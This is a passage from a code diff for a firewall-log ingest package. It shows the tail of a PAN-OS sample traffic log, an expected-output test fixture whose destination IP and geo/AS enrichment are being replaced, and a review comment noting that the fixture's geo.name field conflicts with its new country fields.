16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 
16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 
PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json
index b9068f5dafd..963b8376a9e 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json
@@ -4,27 +4,29 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "184.51.253.152"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 16625,
+ "number": 4837,
 "organization": {
- "name": "Akamai Technologies, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
 "bytes": 5976,
- "ip": "184.51.253.152",
+ "ip": "175.16.199.1",
 "packets": 20
 },
 "rule": {
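Review bot: The regenerated expectation keeps `"name": "United States"` inside `destination.geo` while the enrichment for 175.16.199.1 now asserts `"country_name": "China"` and `"country_iso_code": "CN"`, so the fixture pins two contradictory locations for the same address. `geo.name` appears to be copied from the log's destination-location column (the `United States` field visible in the `message` string) rather than from the GeoIP lookup, so this is most likely not a pipeline defect, but anyone reading the fixture will assume one of the two values is wrong. Since the sample's destination addresses are being moved to the supported test subset anyway, consider also updating that column in the sample log so the regenerated file carries `"name": "China"`, or add a one-line note in the package docs that `destination.geo.name` reflects the device's own region string and not the enrichment. The expected file is generated, so the change belongs in the sample log followed by a regeneration.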
@@ -43,7 +45,7 @@
 "packets": 16,
 "ip": "192.168.15.207"
 },
- "message": "192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
